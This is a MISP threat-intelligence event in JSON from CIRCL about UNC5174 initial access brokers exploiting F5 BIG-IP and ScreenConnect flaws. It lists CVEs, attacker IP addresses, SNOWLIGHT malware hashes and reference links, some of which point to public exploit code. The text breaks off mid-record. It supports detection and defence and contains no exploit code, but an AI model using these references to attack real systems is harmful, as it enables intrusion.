{
  "Event": {
    "analysis": "2",
    "date": "2025-10-16",
    "extends_uuid": "",
    "info": "OSINT - Bringing Access Back \u2014 Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect",
    "publish_timestamp": "1760629208",
    "published": true,
    "threat_level_id": "4",
    "timestamp": "1760629191",
    "uuid": "3496d16f-84bf-489c-9bc1-95635a9afd36",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#6090c4",
        "local": false,
        "name": "misp-galaxy:threat-actor=\"UNC5174\"",
        "relationship_type": ""
      },
      {
        "colour": "#004646",
        "local": false,
        "name": "type:OSINT",
        "relationship_type": ""
      },
      {
        "colour": "#0071c3",
        "local": false,
        "name": "osint:lifetime=\"perpetual\"",
        "relationship_type": ""
      },
      {
        "colour": "#0087e8",
        "local": false,
        "name": "osint:certainty=\"50\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:clear",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "Payload delivery",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619527",
        "to_ids": false,
        "type": "vulnerability",
        "uuid": "8a1470bb-cb48-4273-b708-3826281402d1",
        "value": "CVE-2023-46747"
      },
      {
        "category": "Payload delivery",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619540",
        "to_ids": false,
        "type": "vulnerability",
        "uuid": "7f0ae019-5004-4499-bd86-c00c0ea415e6",
        "value": "CVE-2024-1709"
      },
      {
        "category": "Payload delivery",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619552",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "ce72840b-8b19-4ab9-a980-b4bf24cee216",
        "value": "172.104.124.74"
      },
      {
        "category": "Payload delivery",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619571",
        "to_ids": false,
        "type": "vulnerability",
        "uuid": "9dcbe33e-2db4-43ec-a270-7b576e1bf402",
        "value": "CVE-2023-22515"
      },
      {
        "category": "Payload delivery",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619591",
        "to_ids": false,
        "type": "vulnerability",
        "uuid": "84027b76-5506-42f5-b092-c327d0ced665",
        "value": "CVE-2024-1708"
      },
      {
        "category": "Payload delivery",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619609",
        "to_ids": false,
        "type": "vulnerability",
        "uuid": "c7932fe2-0dc3-447b-a13d-dcc10ed64cc0",
        "value": "CVE-2025-53690"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619674",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "074c168f-ea4a-4ae8-a020-76fcffcaac03",
        "value": "118.140.151.242"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619674",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "576e31cf-07b6-40b2-8038-906ee37a58c4",
        "value": "61.239.68.73"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760619674",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "501af45d-3f85-43a8-8f09-7b8f106c73ac",
        "value": "172.245.68.110"
      },
      {
        "category": "Payload delivery",
        "comment": "SNOWLIGHT",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760620538",
        "to_ids": true,
        "type": "md5",
        "uuid": "94b78ce5-60cc-4f45-b1e5-fad66f202c99",
        "value": "c867881c56698f938b4e8edafe76a09b"
      },
      {
        "category": "Payload delivery",
        "comment": "SNOWLIGHT",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760620538",
        "to_ids": true,
        "type": "md5",
        "uuid": "55320f47-f8b1-482d-8495-ed9340e8c29e",
        "value": "df4603548b10211f0aa77d0e9a172438"
      },
      {
        "category": "Payload delivery",
        "comment": "SNOWLIGHT",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760620538",
        "to_ids": true,
        "type": "md5",
        "uuid": "4d82ac15-f5d7-40b9-907d-dbd44c0096e2",
        "value": "0951109dd1be0d84a33d52c135ba9c97"
      },
      {
        "category": "Payload delivery",
        "comment": "SNOWLIGHT",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760620538",
        "to_ids": true,
        "type": "md5",
        "uuid": "b04da572-62dd-4e40-b7e2-115d5cd6aeff",
        "value": "9c3bf506dd19c08c0ed3af9c1708a770"
      },
      {
        "category": "Payload delivery",
        "comment": "SNOWLIGHT",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760620538",
        "to_ids": true,
        "type": "md5",
        "uuid": "a59ab442-e2cb-4e31-93f6-b9aff9feeb8c",
        "value": "0ba435460fb7622344eec28063274b8a"
      },
      {
        "category": "Payload delivery",
        "comment": "SNOWLIGHT",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1760620538",
        "to_ids": true,
        "type": "md5",
        "uuid": "4a5899df-e8a2-44af-b0d1-947219f1028c",
        "value": "a78bf3d16349eba86719539ee8ef562d"
      }
    ],
    "Object": [
      {
        "comment": "CVE-2025-53690: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "9",
        "timestamp": "1760620611",
        "uuid": "403f8e5d-d27b-4a1c-80de-a1906896ad9f",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "403f8e5d-d27b-4a1c-80de-a1906896ad9f",
            "referenced_uuid": "c7932fe2-0dc3-447b-a13d-dcc10ed64cc0",
            "relationship_type": "related-to",
            "timestamp": "1760620611",
            "uuid": "3aa5c96e-389b-4092-9cd1-d58f03e8fa71"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620611",
            "to_ids": false,
            "type": "link",
            "uuid": "94a00f20-9558-4ed1-9f6e-9730e48f23c7",
            "value": "https://vulnerability.circl.lu/vuln/CVE-2025-53690"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1760620611",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "40b05dd4-aad1-4a69-b271-561ab41f7d93",
            "value": "CVE-2025-53690"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1760620611",
            "to_ids": false,
            "type": "datetime",
            "uuid": "cd7c1890-e85b-4384-b788-50d7b00d45c4",
            "value": "2025-09-03T20:04:48.223000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1760620611",
            "to_ids": false,
            "type": "datetime",
            "uuid": "a777f028-49f2-48d1-ae86-e719da0948be",
            "value": "2025-09-05T03:55:32.039000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1760620611",
            "to_ids": false,
            "type": "text",
            "uuid": "db3daa92-4298-467d-af6d-48e759e5b135",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620611",
            "to_ids": false,
            "type": "link",
            "uuid": "74e70f4c-3660-4dc9-8a7f-696be842579d",
            "value": "https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserialization-zero-day-vulnerability"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620611",
            "to_ids": false,
            "type": "link",
            "uuid": "ca081b1a-4da6-46c6-b187-8a98fb381d4b",
            "value": "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003865"
          }
        ]
      },
      {
        "comment": "CVE-2024-1708: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "9",
        "timestamp": "1760620623",
        "uuid": "29bb3248-3bac-482b-ae10-f363d62f61ab",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "29bb3248-3bac-482b-ae10-f363d62f61ab",
            "referenced_uuid": "84027b76-5506-42f5-b092-c327d0ced665",
            "relationship_type": "related-to",
            "timestamp": "1760620623",
            "uuid": "95be360d-6283-49dc-b276-c7670b19675a"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "link",
            "uuid": "01a3c7e7-d126-417a-b596-ff2f7bfec25d",
            "value": "https://vulnerability.circl.lu/vuln/CVE-2024-1708"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "cdeabe7b-fd3b-4db2-a0ba-aa57e8dfc6d4",
            "value": "CVE-2024-1708"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "datetime",
            "uuid": "9efeb1cc-ffa0-42b8-9794-772a89a73e1a",
            "value": "2024-02-21T15:29:10.091000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "datetime",
            "uuid": "1a75c69e-87a2-41a0-a43c-5b75bae4cb82",
            "value": "2024-08-01T18:48:21.724000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "text",
            "uuid": "daca78e5-8e6f-41a2-96ea-2dcd0d6e96b1",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "link",
            "uuid": "1f5ee2d8-9565-434c-a274-426c51b752fe",
            "value": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "link",
            "uuid": "5bf6747d-1e61-49c4-b4d5-164c593833da",
            "value": "https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620623",
            "to_ids": false,
            "type": "cpe",
            "uuid": "38a4e3b0-8baf-420b-bc1f-2232b5aaafe7",
            "value": "cpe:2.3:a:connectwise:screenconnect:-:*:*:*:*:*:*:*"
          }
        ]
      },
      {
        "comment": "CVE-2023-22515: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "9",
        "timestamp": "1760620645",
        "uuid": "1b69d4bb-1cfa-436f-9e30-4ad623f3a264",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "1b69d4bb-1cfa-436f-9e30-4ad623f3a264",
            "referenced_uuid": "9dcbe33e-2db4-43ec-a270-7b576e1bf402",
            "relationship_type": "related-to",
            "timestamp": "1760620645",
            "uuid": "2bbb3adf-b7df-4951-8d1d-22b6cb981724"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "link",
            "uuid": "fe27e981-b703-4bf6-af2f-b6e4b446e9ab",
            "value": "https://vulnerability.circl.lu/vuln/CVE-2023-22515"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "95c0ab7b-2c18-49d0-bbf5-326224b2f006",
            "value": "CVE-2023-22515"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "datetime",
            "uuid": "793f6de4-b7d9-4ea1-b152-196272faab50",
            "value": "2023-10-04T14:00:00.820000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "datetime",
            "uuid": "7f0570a9-a4de-4db5-b77d-5fc6dfc1b5f1",
            "value": "2025-07-30T01:37:15.211000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "text",
            "uuid": "23c5b283-1810-42b8-9ae4-fadf9ea1efaf",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "link",
            "uuid": "2adeb8fc-42a7-4169-bd9c-0fc08e084beb",
            "value": "http://packetstormsecurity.com/files/175225/Atlassian-Confluence-Unauthenticated-Remote-Code-Execution.html"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "link",
            "uuid": "c1ce4c7a-5d79-4fd7-816f-c7fbd172ec69",
            "value": "https://confluence.atlassian.com/display/KB/FAQ+for+CVE-2023-22515"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "link",
            "uuid": "791c9dc2-03c9-4927-b89b-c531f25050e4",
            "value": "https://confluence.atlassian.com/pages/viewpage.action?pageId=1295682276"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "link",
            "uuid": "56340368-6a28-44c8-b9e7-c1fba5d811f0",
            "value": "https://jira.atlassian.com/browse/CONFSERVER-92475"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "cpe",
            "uuid": "5dd9105f-42da-42b8-b900-8616bf1c3297",
            "value": "cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "cpe",
            "uuid": "e9e48475-b829-4d22-9d9d-81a152645c80",
            "value": "cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "cpe",
            "uuid": "ed0e4086-1f19-4111-839c-2fd84174a661",
            "value": "cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "cpe",
            "uuid": "d5adf41a-b7c9-4206-beb8-99a70ac5bab9",
            "value": "cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "cpe",
            "uuid": "a340353a-3b32-42aa-a68b-216e150e3ef8",
            "value": "cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620645",
            "to_ids": false,
            "type": "cpe",
            "uuid": "b89c0022-5fd3-4e04-b27f-63ec6b4a0955",
            "value": "cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*"
          }
        ]
      },
      {
        "comment": "CVE-2023-46747: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "9",
        "timestamp": "1760620653",
        "uuid": "682bae4d-1f80-4ad8-9122-3079c53fe932",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "682bae4d-1f80-4ad8-9122-3079c53fe932",
            "referenced_uuid": "8a1470bb-cb48-4273-b708-3826281402d1",
            "relationship_type": "related-to",
            "timestamp": "1760620653",
            "uuid": "04d4d48e-4efd-43fc-8cbe-181575fa56cb"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "link",
            "uuid": "d657faaa-7f19-4b0b-b5d3-3edb60b760e9",
            "value": "https://vulnerability.circl.lu/vuln/CVE-2023-46747"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "ce429fc9-39b0-4b16-a6b4-9d4d628fb787",
            "value": "CVE-2023-46747"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "datetime",
            "uuid": "3a07d566-6f62-4084-8195-a313f37f4eeb",
            "value": "2023-10-26T20:04:53.929000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "datetime",
            "uuid": "517e9ae3-b512-4cca-8168-192352da8b12",
            "value": "2025-07-30T01:37:13.346000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "text",
            "uuid": "302ea955-4201-41a9-b57c-e39794d44168",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "link",
            "uuid": "9ee21820-f7fd-4566-8cf6-3e585f5c8cef",
            "value": "https://my.f5.com/manage/s/article/K000137353"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "link",
            "uuid": "e7ec1376-bcfc-439d-b0d6-224f7aa2ab87",
            "value": "http://packetstormsecurity.com/files/175673/F5-BIG-IP-TMUI-AJP-Smuggling-Remote-Command-Execution.html"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620653",
            "to_ids": false,
            "type": "link",
            "uuid": "9d16290a-c7c4-4372-b06d-b92625c3858e",
            "value": "https://www.secpod.com/blog/f5-issues-warning-big-ip-vulnerability-used-in-active-exploit-chain/"
          }
        ]
      },
      {
        "comment": "CVE-2024-1709: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "9",
        "timestamp": "1760620664",
        "uuid": "f8f4cd54-18cf-4a8f-bd1a-86320f250c02",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "f8f4cd54-18cf-4a8f-bd1a-86320f250c02",
            "referenced_uuid": "7f0ae019-5004-4499-bd86-c00c0ea415e6",
            "relationship_type": "related-to",
            "timestamp": "1760620664",
            "uuid": "9580f85a-6f6b-40ec-83df-e23c08d16994"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "5d3ae2ad-5d0d-4f8d-a55f-9401dc77062d",
            "value": "https://vulnerability.circl.lu/vuln/CVE-2024-1709"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "e8987744-19e7-40e6-adee-453b37f43bc8",
            "value": "CVE-2024-1709"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "datetime",
            "uuid": "a96e85f5-2ab8-4bdf-a1cb-5a8a8164126e",
            "value": "2024-02-21T15:36:03.960000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "datetime",
            "uuid": "c1d60db1-e6fd-4c28-9acb-2cf116a37d9c",
            "value": "2025-07-30T01:37:06.637000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "text",
            "uuid": "a14f91f1-3af4-4e96-9e23-e05fdf861947",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "f4366e77-a55d-4494-a0bd-268e37d81c34",
            "value": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "6c2f8696-4d0e-4013-a9fd-cf5a004ac8ed",
            "value": "https://www.huntress.com/blog/vulnerability-reproduced-immediately-patch-screenconnect-23-9-8"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "76f6b775-2e87-42ff-a4cf-f542d6343804",
            "value": "https://www.huntress.com/blog/detection-guidance-for-connectwise-cwe-288-2"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "fcab11b2-07ca-42c6-81c4-273811f0d95a",
            "value": "https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "6884203f-20b0-437e-8bc3-d1656a7d894c",
            "value": "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "a4ef5363-ae01-4fee-92f1-7211917b489a",
            "value": "https://github.com/rapid7/metasploit-framework/pull/18870"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "6d829a85-293b-4228-8534-50c0531c85d2",
            "value": "https://www.horizon3.ai/attack-research/red-team/connectwise-screenconnect-auth-bypass-deep-dive/"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "48992366-cf8c-4eea-9f93-61f61ba613b4",
            "value": "https://techcrunch.com/2024/02/21/researchers-warn-high-risk-connectwise-flaw-under-attack-is-embarrassingly-easy-to-exploit/"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "f36527f5-93aa-4845-8ab8-dfe8ed8254b1",
            "value": "https://www.securityweek.com/connectwise-confirms-screenconnect-flaw-under-active-exploitation/"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "link",
            "uuid": "9413252d-bb38-4e7e-b034-363d73fdc28e",
            "value": "https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vulnerable-configuration",
            "timestamp": "1760620664",
            "to_ids": false,
            "type": "cpe",
            "uuid": "7b591bfb-f35e-4344-a383-f923faf2ee3c",
            "value": "cpe:2.3:a:connectwise:screenconnect:-:*:*:*:*:*:*:*"
          }
        ]
      },
      {
        "comment": "CVE-2023-46747: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "9",
        "timestamp": "1760629191",
        "uuid": "623df020-0e4e-4d93-8693-14e466df93be",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "623df020-0e4e-4d93-8693-14e466df93be",
            "referenced_uuid": "8a1470bb-cb48-4273-b708-3826281402d1",
            "relationship_type": "related-to",
            "timestamp": "1760629191",
            "uuid": "7d250591-d1d0-480a-9102-ab4900c0af5a"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "link",
            "uuid": "1e16708d-48b3-438e-aa39-1ed2634c9b17",
            "value": "https://vulnerability.circl.lu/vuln/CVE-2023-46747"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "2bab92c5-dae6-4a4c-8c12-0a25512bc643",
            "value": "CVE-2023-46747"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "datetime",
            "uuid": "e1a2fc4e-b0de-46b6-b38d-6ad191507fed",
            "value": "2023-10-26T20:04:53.929000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "datetime",
            "uuid": "637c5e84-08dd-4dde-8550-9853b5118a62",
            "value": "2025-07-30T01:37:13.346000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "text",
            "uuid": "ed598782-2c8d-4b96-9dd1-85ae7e26e074",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "link",
            "uuid": "918fcce9-5aca-4322-955d-21d30baf5f9b",
            "value": "https://my.f5.com/manage/s/article/K000137353"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "link",
            "uuid": "0592d7cf-8558-4ed6-8cfb-7cced08bec67",
            "value": "http://packetstormsecurity.com/files/175673/F5-BIG-IP-TMUI-AJP-Smuggling-Remote-Command-Execution.html"
          },
          {
            "category": "External analysis",
            "comment": "",
